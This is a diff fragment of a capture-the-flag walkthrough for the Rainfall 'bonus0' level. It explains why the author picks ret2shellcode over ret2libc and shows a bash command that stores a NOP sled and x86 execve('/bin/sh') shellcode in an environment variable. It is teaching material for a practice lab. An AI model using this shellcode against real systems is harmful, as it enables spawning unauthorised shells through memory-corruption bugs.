alexandre-hallaine/Rainfall/bonus0/walkthrough.md

 Since a ret2libc would requiere 12 bytes (4 bytes for the address of `system`, 4 bytes for the address of `exit` and 4 bytes for the address of "/bin/sh"), we're just going to use a ret2shellcode.

+Check the [level1's walkthrough](../level1/walkthrough.md#ret2shellcode) for an explanation of the ret2shellcode technique.

-We can either feed our shellcode to the program in the `buf` of the `p` function who has a size of 4096 bytes thanks to the `read` function, or we can put the shellcode in an environment variable `EXPLOIT`.
+We can either feed our shellcode to the program, or we can put the shellcode in an environment variable.
 For convenience, we'll use the environment variable:
 ```bash
 bonus0@RainFall:~$ export EXPLOIT=`python -c "print '\x90' * 200 + '\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"`
 ```